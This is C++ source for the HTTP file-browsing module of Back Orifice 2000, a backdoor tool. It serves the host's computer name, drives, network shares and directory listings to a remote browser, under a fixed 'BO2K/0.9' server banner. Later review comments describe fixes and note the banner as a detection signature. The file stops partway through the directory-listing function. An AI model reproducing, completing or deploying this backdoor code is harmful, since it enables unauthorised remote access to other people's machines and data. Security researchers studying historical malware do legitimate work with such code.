📄 cmd_tcpip_http.cpp
/* Back Orifice 2000 - Remote Administration Suite
Copyright (C) 1999, Cult Of The Dead Cow
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
The author of this program may be contacted at dildog@l0pht.com. */
#include<windows.h>
#include<auth.h>
#include<osversion.h>
#include<iohandler.h>
#include<functions.h>
#include<cmd\cmd_tcpip.h>
#include<pviewer.h>
#include<strhandle.h>
//typedef struct __port_child_param {
// SOCKET s;
// SOCKADDR_IN saddr;
// BOOL *pbDone;
// int nArg1;
// char *svArg2;
// char *svArg3;
//} PORT_CHILD_PARAM;
// Pair of 32-bit halves (low, high) declared with 1-byte packing so the
// struct has no padding.  It is not referenced in the part of the file
// visible here.
#pragma pack(push,1)
typedef struct {
DWORD LowPart;
DWORD HighPart;
} ULARGE_INT;
#pragma pack(pop)
// Content-type strings handed to FormatHttpHeader().  GetMimeType() returns
// one of these pointers, so callers receive file-scope storage that they
// must not free or modify.
static char *typehtml = "text/html";
static char *typetext = "text/plain";
static char *typebinary = "application/octet-stream";
static char *typejpeg = "image/jpeg";
static char *typegif = "image/gif";
// Error text; not used in the part of the file visible here.
static char *dataerror = "Missing data";
// Icon identifiers for the generated HTML pages.  The numeric value of each
// enumerator is written into image URLs of the form "/?image=<n>" by the
// page generators below, so the order of the enumerators is part of the URL
// scheme.  The handler that serves "/?image=" is outside this view;
// presumably it indexes its image table by this value -- confirm before
// reordering.
// NOTE(review): the enumerator names FILE and DOMAIN are also used by the C
// standard headers (<stdio.h>, <math.h>); this only compiles while those
// names are not visible in this translation unit.
typedef enum {
FOLDER,
FILE,
EXE,
IMAGE,
HTML,
TEXT,
COMPUTER,
DRIVE,
CDROM,
REMOTE,
ENTIRENETWORK,
NETWORK,
DOMAIN,
SERVER,
PRINTER
} GIFICON;
/*
 * GetMimeType - pick the Content-type string for a file name.
 *
 * The text after the last '.' in filename is compared, ignoring case,
 * against a short list of known extensions.  The search for '.' covers the
 * whole string, so when the final path component has no extension a dot in
 * a directory component is what gets examined.
 *
 * filename must be a valid NUL-terminated string (it is not checked for
 * NULL).  Returns one of the file-scope type strings; a name with no dot or
 * with an unrecognised extension yields typebinary.
 */
char *GetMimeType(char *filename)
{
	// Extensions that are served as plain text.
	static const char *const svTextExts[] = {
		"c", "cpp", "txt", "diz", "h", "bat", "ini", "reg"
	};
	char *svExt = strrchr(filename, '.');
	unsigned int n;

	if (svExt == NULL) {
		return typebinary;
	}
	svExt++;	// step past the dot itself

	if (lstrcmpi(svExt, "gif") == 0) {
		return typegif;
	}
	if (lstrcmpi(svExt, "jpg") == 0 || lstrcmpi(svExt, "jpeg") == 0) {
		return typejpeg;
	}
	if (lstrcmpi(svExt, "htm") == 0 || lstrcmpi(svExt, "html") == 0) {
		return typehtml;
	}
	for (n = 0; n < sizeof(svTextExts) / sizeof(svTextExts[0]); n++) {
		if (lstrcmpi(svExt, svTextExts[n]) == 0) {
			return typetext;
		}
	}
	return typebinary;
}
/*
 * GetFileIcon - pick the listing icon for a file name.
 *
 * Works like GetMimeType(): the text after the last '.' is matched,
 * ignoring case, against a table of known extensions.  filename must be a
 * valid NUL-terminated string.  Returns IMAGE, EXE, HTML or TEXT for a
 * recognised extension and FILE for everything else, including names that
 * contain no dot.
 */
GIFICON GetFileIcon(char *filename)
{
	// Every extension appears once, so lookup order does not matter.
	static const struct {
		const char *svExt;
		GIFICON icon;
	} iconTable[] = {
		{ "gif",  IMAGE }, { "jpg",  IMAGE }, { "jpeg", IMAGE }, { "bmp", IMAGE },
		{ "exe",  EXE   }, { "com",  EXE   }, { "sys",  EXE   },
		{ "vxd",  EXE   }, { "dll",  EXE   }, { "cpl",  EXE   },
		{ "htm",  HTML  }, { "html", HTML  },
		{ "c",    TEXT  }, { "cpp",  TEXT  }, { "txt",  TEXT  }, { "diz", TEXT },
		{ "h",    TEXT  }, { "bat",  TEXT  }, { "ini",  TEXT  }, { "reg", TEXT }
	};
	char *svExt = strrchr(filename, '.');
	unsigned int n;

	if (svExt == NULL) {
		return FILE;
	}
	svExt++;	// step past the dot itself

	for (n = 0; n < sizeof(iconTable) / sizeof(iconTable[0]); n++) {
		if (lstrcmpi(svExt, iconTable[n].svExt) == 0) {
			return iconTable[n].icon;
		}
	}
	return FILE;
}
/*
 * FormatTime - render a SYSTEMTIME as an HTTP-style date string.
 *
 * Writes "Www, DD Mmm YYYY HH:MM:SS GMT" into buff.  The fields are printed
 * as given and no time-zone conversion is done here, so the "GMT" label is
 * only correct when the caller passes a UTC time; the caller in this file
 * passes the result of GetSystemTime().  A weekday or month value outside
 * the expected range is printed as "???".
 *
 * buff is written with wsprintf(), which takes no size argument, so the
 * caller must supply enough room.  The caller visible here passes 256 bytes.
 */
void FormatTime(char *buff, SYSTEMTIME thetime)
{
	static const char *const svDayNames[7] = {
		"Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"
	};
	static const char *const svMonthNames[12] = {
		"Jan", "Feb", "Mar", "Apr", "May", "Jun",
		"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"
	};
	const char *weekday = "???";
	const char *month = "???";

	// wDayOfWeek counts from 0 (Sunday); wMonth counts from 1 (January).
	if (thetime.wDayOfWeek <= 6) {
		weekday = svDayNames[thetime.wDayOfWeek];
	}
	if (thetime.wMonth >= 1 && thetime.wMonth <= 12) {
		month = svMonthNames[thetime.wMonth - 1];
	}

	wsprintf(buff, "%s, %02d %s %d %02d:%02d:%02d GMT",
		weekday, thetime.wDay, month, thetime.wYear,
		thetime.wHour, thetime.wMinute, thetime.wSecond);
}
/*
 * FormatHttpHeader - build the status line and header block of a response.
 *
 * buff        receives the text.  It is written with wsprintf(), which
 *             takes no size argument (the Win32 documentation caps its
 *             output at 1024 bytes); the callers visible in this file pass
 *             a 1024-byte buffer.
 * val         HTTP status code.  Codes not in the table below get an empty
 *             reason phrase.
 * contenttype value for the Content-type header.
 * svOther     text inserted verbatim between the fixed headers and the
 *             blank line that ends the header block.  Pass "" for none;
 *             otherwise each header line must carry its own CRLF.  Nothing
 *             is validated or escaped, so it must not contain
 *             request-derived data.
 *
 * The Date header is the current system time from GetSystemTime().  Every
 * response carries the fixed banner "Server: BO2K/0.9", a constant string
 * that network detection signatures can match on.
 */
void FormatHttpHeader(char *buff, int val, char *contenttype, char *svOther)
{
	static const struct {
		int nCode;
		const char *svReason;
	} reasonTable[] = {
		{ 200, "OK" },
		{ 201, "Created" },
		{ 202, "Accepted" },
		{ 204, "No Content" },
		{ 300, "Multiple Choices" },
		{ 301, "Moved Permanently" },
		{ 302, "Moved Temporarily" },
		{ 304, "Not modified" },
		{ 400, "Bad Request" },
		{ 401, "Unauthorized" },
		{ 403, "Forbidden" },
		{ 404, "Not Found" },
		{ 500, "Internal Server Error" },
		{ 501, "Not Implemented" },
		{ 502, "Bad Gateway" },
		{ 503, "Service Unavailable" }
	};
	const char *errtxt = "";
	char date[256];
	SYSTEMTIME curtime;
	unsigned int n;

	// Look up the reason phrase for the status code.
	for (n = 0; n < sizeof(reasonTable) / sizeof(reasonTable[0]); n++) {
		if (reasonTable[n].nCode == val) {
			errtxt = reasonTable[n].svReason;
			break;
		}
	}

	GetSystemTime(&curtime);
	FormatTime(date, curtime);

	wsprintf(buff, "HTTP/1.1 %d %s\r\nServer: BO2K/0.9\r\nDate: %s\r\nContent-type: %s\r\nPublic: GET, POST\r\n%s\r\n", val, errtxt, date, contenttype,svOther);
}
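/*
 * HTTPEnumRes - write an HTML listing of network resources to a socket.
 *
 * s             connected socket that receives the HTML fragments.
 * pNetContainer container to enumerate; the caller in this file passes NULL
 *               for the top level.
 * dwScope       scope passed to the enumeration call.  Containers are
 *               descended into recursively only for RESOURCE_GLOBALNET.
 *
 * The enumeration goes through pWNetOpenEnum / pWNetEnumResource /
 * pWNetCloseEnum, which are declared outside this file.  One resource is
 * fetched per call and emitted as one line of HTML; disk shares are wrapped
 * in a link built from the remote name.
 *
 * Changes from the original listing:
 *  - the loop runs only while the enumeration call succeeds.  The original
 *    kept going on every result except ERROR_NO_MORE_ITEMS, so any other
 *    error made it read the unfilled buffer, possibly forever;
 *  - icon always has a defined value.  A share that was neither disk nor
 *    print left it uninitialised;
 *  - the share link is built only when the remote name is present and fits
 *    in svURLHead.  The original dereferenced lpRemoteName+2 unchecked and
 *    could write past the MAX_PATH+1 byte buffer.
 *
 * NOTE(review): resource names and comments come from the network and are
 * written into the page without HTML escaping.  The return value of send()
 * is ignored.
 */
void HTTPEnumRes(SOCKET s, NETRESOURCE *pNetContainer, DWORD dwScope)
{
	const DWORD dwEnumBufSize = 16384;
	char svBuffer[2048];
	int i;

	// Open network resource list
	HANDLE hNet;
	if (pWNetOpenEnum(dwScope, RESOURCETYPE_ANY, 0, pNetContainer, &hNet) != NO_ERROR) {
		return;
	}

	// Enumerate resources
	int ret;
	DWORD dwCount, dwBufSize;
	NETRESOURCE *pNetRes;

	pNetRes = (NETRESOURCE *)malloc(dwEnumBufSize);
	if (pNetRes == NULL) {
		pWNetCloseEnum(hNet);
		return;
	}

	dwCount = 1;
	dwBufSize = dwEnumBufSize;
	ret = pWNetEnumResource(hNet, &dwCount, pNetRes, &dwBufSize);
	while (ret == NO_ERROR) {
		// Give up time
		Sleep(20);

		const char *svLocalName, *svRemoteName, *svComment;
		GIFICON icon = NETWORK;	// default for any type not handled below
		char svURLHead[MAX_PATH+1];
		char svURLFoot[MAX_PATH+1];
		svURLHead[0] = '\0';
		svURLFoot[0] = '\0';

		switch (pNetRes->dwDisplayType) {
		case RESOURCEDISPLAYTYPE_DOMAIN:
			icon = DOMAIN;
			break;
		case RESOURCEDISPLAYTYPE_GENERIC:
		case RESOURCEDISPLAYTYPE_SERVER:
			icon = SERVER;
			break;
		case RESOURCEDISPLAYTYPE_SHARE:
			if (pNetRes->dwType == RESOURCETYPE_DISK) {
				const char *svShare = pNetRes->lpRemoteName;
				icon = FOLDER;
				// The link target is the remote name without its first
				// two characters.  Build it only when the name is long
				// enough to skip them and the complete tag, including
				// the terminator, fits in svURLHead.
				if (svShare != NULL && lstrlen(svShare) >= 2 &&
				    (size_t)lstrlen(svShare + 2) + sizeof("<a href=\"/\">") <= sizeof(svURLHead)) {
					wsprintf(svURLHead, "<a href=\"%s/\">", svShare + 2);
					for (i = lstrlen(svURLHead) - 1; i >= 0; i--) {
						if (svURLHead[i] == '\\') {
							svURLHead[i] = '/';
						}
					}
					wsprintf(svURLFoot, "</a>");
				}
			} else if (pNetRes->dwType == RESOURCETYPE_PRINT) {
				icon = PRINTER;
			}
			break;
		default:
			break;
		}

		// Absent strings are printed as empty.
		svLocalName = (pNetRes->lpLocalName != NULL) ? pNetRes->lpLocalName : "";
		svRemoteName = (pNetRes->lpRemoteName != NULL) ? pNetRes->lpRemoteName : "";
		svComment = (pNetRes->lpComment != NULL) ? pNetRes->lpComment : "";

		if (!pNetRes->lpLocalName && !pNetRes->lpRemoteName) {
			wsprintf(svBuffer, "<img src=\"/?image=%u\"> %s<br>\r\n", icon, svComment);
		} else {
			wsprintf(svBuffer, "<img src=\"/?image=%u\"> %s%s%s <b>%s</b> <i>%s</i><br>\r\n", icon, svURLHead, svRemoteName, svURLFoot, svLocalName, svComment);
		}
		send(s, svBuffer, lstrlen(svBuffer), 0);

		// Recurse if necessary
		if ((pNetRes->dwUsage & RESOURCEUSAGE_CONTAINER) && dwScope == RESOURCE_GLOBALNET) {
			wsprintf(svBuffer, "<ul>");
			send(s, svBuffer, lstrlen(svBuffer), 0);
			HTTPEnumRes(s, pNetRes, dwScope);
			wsprintf(svBuffer, "</ul>");
			send(s, svBuffer, lstrlen(svBuffer), 0);
		}

		dwCount = 1;
		dwBufSize = dwEnumBufSize;
		ret = pWNetEnumResource(hNet, &dwCount, pNetRes, &dwBufSize);
	}

	free(pNetRes);
	pWNetCloseEnum(hNet);
}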
void HTTPHandleFile(SOCKET s, char *svReqType, char *svFullPath, char *svKnownPath, int nHTTPVersion)
{
char svBuffer[1024];
int i,j;
if(lstrcmp(svFullPath,"\\")==0) {
// Display computer name
DWORD dwBufSize = MAX_COMPUTERNAME_LENGTH+1;
char svComputerName[MAX_COMPUTERNAME_LENGTH+1];
if(GetComputerName(svComputerName, &dwBufSize)==FALSE) {
return;
}
// Issue headers and start of html
FormatHttpHeader(svBuffer,200,typehtml,"");
send(s,svBuffer,lstrlen(svBuffer),0);
// Put computer name header
GIFICON icon;
icon=COMPUTER;
wsprintf(svBuffer,"<html>\r\n<head><title>%s</title></head>\r\n<body bgcolor=#FFFFFF text=#000000>\r\n"
"<h1><img align=absbottom src=/?image=%u> %s</h1>\r\n<ul><pre>\r\n",
svComputerName, icon, svComputerName);
send(s,svBuffer,lstrlen(svBuffer),0);
// List all drives
char c;
int x;
for (c = 'C'; c <= 'Z'; c++) {
char *svDesc;
char svDesc2[512];
wsprintf(svBuffer,"%c:\\",c);
x = GetDriveType(svBuffer);
switch (x) {
case 0:
icon=DRIVE;
svDesc="Unable to determine";
break;
case 1:
break;
case DRIVE_REMOVABLE:
icon=DRIVE;
svDesc="Removable";
break;
case DRIVE_FIXED:
icon=DRIVE;
DWORD spc,bps,nfc,tnc,dwFree,dwTotal;
if (GetDiskFreeSpace(svBuffer,&spc,&bps,&nfc,&tnc)) {
dwFree=(nfc*((bps*spc)/1024));
dwTotal=(tnc*((bps*spc)/1024));
char fc,tc;
tc='K';
if(dwTotal>1024) {
dwTotal>>=10;
tc='M';
}
fc='K';
if(dwFree>1024) {
dwFree>>=10;
fc='M';
}
wsprintf(svDesc2, "Fixed Bytes free: %u%c/%u%c", dwFree, fc, dwTotal, tc);
svDesc=svDesc2;
} else svDesc="Fixed";
break;
case DRIVE_REMOTE:
icon=REMOTE;
svDesc="Remote";
break;
case DRIVE_CDROM:
icon=CDROM;
svDesc="CDROM";
break;
case DRIVE_RAMDISK:
icon=DRIVE;
svDesc="Ramdisk";
break;
default:
icon=DRIVE;
svDesc="Unknown";
break;
}
if(x!=1) {
wsprintf(svBuffer,"<img align=absbottom src=/?image=%u><a href=/%%DRIVE%%%c:/>%c:\\</a> %s\r\n",
icon,c,c,svDesc);
send(s,svBuffer,lstrlen(svBuffer),0);
}
}
// Issue Link to Network Neighborhood
wsprintf(svBuffer,"\r\n<h2><a href=\"/%%NETHOOD%%/\">Network Neighborhood</a></h2>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
// Issue HTML footers
wsprintf(svBuffer,"</pre></ul>\r\n</body>\r\n</html>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
}
else if(lstrcmp(svFullPath,"\\\\")==0) {
// Issue headers and start of html
FormatHttpHeader(svBuffer,200,typehtml,"");
send(s,svBuffer,lstrlen(svBuffer),0);
// Put title
wsprintf(svBuffer,"<html>\r\n<head><title>Network Neighborhood</title></head>\r\n<body bgcolor=#FFFFFF text=#000000>\r\n"
"<h1><img src=\"/?image=%u\"> Entire Network</h1>\r\n<ul>\r\n",(GIFICON)ENTIRENETWORK);
send(s,svBuffer,lstrlen(svBuffer),0);
HTTPEnumRes(s,NULL,RESOURCE_GLOBALNET);
// Issue HTML footers
wsprintf(svBuffer,"</ul>\r\n</body>\r\n</html>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
} else {
DWORD dwFileAttr;
dwFileAttr=GetFileAttributes(svFullPath);
if(dwFileAttr==-1) dwFileAttr=FILE_ATTRIBUTE_DIRECTORY;
if(dwFileAttr & FILE_ATTRIBUTE_DIRECTORY) {
// Handle directory listing
WIN32_FIND_DATA w32fd;
char svWildCard[MAX_PATH+2];
lstrcpyn(svWildCard,svFullPath,MAX_PATH);
lstrcat(svWildCard,"*");
// Get file listing
HANDLE fh;
int nFileCount=0;
fh=FindFirstFile(svWildCard,&w32fd);
if(fh==INVALID_HANDLE_VALUE) return;
do {
nFileCount++;
} while(FindNextFile(fh,&w32fd));
FindClose(fh);
WIN32_FIND_DATA *pFileArray=(WIN32_FIND_DATA *)malloc(sizeof(WIN32_FIND_DATA)*nFileCount);
if(pFileArray==NULL) return;
fh=FindFirstFile(svWildCard,pFileArray);
if(fh==INVALID_HANDLE_VALUE) return;
for(i=1;i<nFileCount;i++) {
FindNextFile(fh,pFileArray+i);
}
FindClose(fh);
// Sort file listing
WIN32_FIND_DATA tmp;
for(i=0;i<nFileCount;i++) {
for(j=i+1;j<nFileCount;j++) {
if(pFileArray[i].dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if(pFileArray[j].dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if(lstrcmpi(pFileArray[i].cFileName,pFileArray[j].cFileName)>0) {
tmp=pFileArray[i]; pFileArray[i]=pFileArray[j]; pFileArray[j]=tmp;
}
}
} else {
if(pFileArray[j].dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
tmp=pFileArray[i]; pFileArray[i]=pFileArray[j]; pFileArray[j]=tmp;
} else {
if(lstrcmpi(pFileArray[i].cFileName,pFileArray[j].cFileName)>0) {
tmp=pFileArray[i]; pFileArray[i]=pFileArray[j]; pFileArray[j]=tmp;
}
}
}
}
}
// Issue headers and start of html
FormatHttpHeader(svBuffer,200,typehtml,"");
send(s,svBuffer,lstrlen(svBuffer),0);
wsprintf(svBuffer,"<html>\r\n<head><title>%s</title></head>\r\n<body bgcolor=#FFFFFF text=#000000>\r\n"
"<h1>Directory: %s</h1>\r\n<ul><pre>\r\n",svKnownPath,svKnownPath);
send(s,svBuffer,lstrlen(svBuffer),0);
// Output table header
wsprintf(svBuffer,"<b><u> Date Time Size Filename </u></b>\r\n");
send(s,svBuffer,lstrlen(svBuffer),0);
DWORD dwBytesTotal;